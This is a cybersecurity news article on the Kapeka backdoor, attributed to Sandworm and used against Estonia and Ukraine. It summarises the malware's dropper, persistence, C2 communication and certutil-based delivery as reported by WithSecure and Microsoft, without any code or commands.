A newly identified backdoor malware known as Kapeka has been linked to ongoing cyberattacks targeting Eastern European nations, particularly Estonia and Ukraine, since at least mid-2022. This flexible backdoor is believed to be associated with the Russian advanced persistent threat (APT) group Sandworm, a faction also referred to as APT44 or Seashell Blizzard. The identification of Kapeka comes from the findings of Finnish cybersecurity firm WithSecure, which has observed its sporadic use in various attacks. Notably, Microsoft has classified this malware under the name KnuckleTouch.
According to security researcher Mohammad Kazem Hassan Nejad, Kapeka serves as an essential toolkit for its operators, offering functionalities that enable both initial access and prolonged exploitation of compromised systems. The backdoor incorporates a dropper mechanism that executes its main component upon infection and subsequently removes itself from the host. This capability allows Kapeka to establish a persistence mechanism, adapting its method based on available system privileges, whether via scheduled tasks or the autorun registry.
Microsoft’s advisory released in February 2024 highlighted that Kapeka plays a role in multiple ransomware deployment campaigns, assisting threat actors in stealing credentials, carrying out destructive actions, and providing remote access to compromised devices. The malware is executed as a Windows dynamic-link library (DLL) written in C++, featuring an embedded command-and-control (C2) configuration that communicates with a server controlled by the attackers. This design allows it to send and receive commands using JSON, thus maintaining an effective operational framework.
Kapeka disguises itself as a Microsoft Word add-in to blend in with legitimate software, enhancing its deceptive nature. Once installed, the backdoor collects detailed information about the infected host, employing multi-threading to manage incoming commands, execute tasks, and relay results back to the C2 server. It utilizes the WinHttp 5.1 COM interface for its network communications, ensuring that it can poll the C2 for new instructions and forward task outcomes.
While the precise distribution methods of Kapeka remain unclear, Microsoft has indicated that the dropper may be retrieved from compromised websites using the certutil utility, a technique that underscores the use of legitimate binaries in cyberattacks—an approach referred to in cybersecurity as living-off-the-land binaries (LOLBins).
The correlation between Kapeka and previous cyber threat actors is established through its technical and conceptual similarities with malware families such as GreyEnergy, believed to be a successor to the BlackEnergy toolkit. WithSecure posits that Kapeka may have played a role in campaigns that led to the deployment of Prestige ransomware late in 2022, suggesting that it may represent a newer iteration of tools within Sandworm’s arsenal.
Given its level of sophistication and stealth, along with its sporadic visibility in the wild, Kapeka exemplifies APT-level activity that is highly suggestive of Russian involvement. Its implications for cybersecurity in affected regions cannot be overstated, as threats to data integrity and remote system access pose significant risks to businesses and governmental institutions alike. As with many APT activities, one can refer to the MITRE ATT&CK framework to understand the tactics and techniques potentially employed in these attacks, such as initial access via compromised websites, establishing persistence through autorun entries, and executing commands for data exfiltration and system manipulation.
The recent emergence of Kapeka serves as a reminder for businesses to enhance their cybersecurity measures and remain vigilant against the evolving landscape of cyber threats.
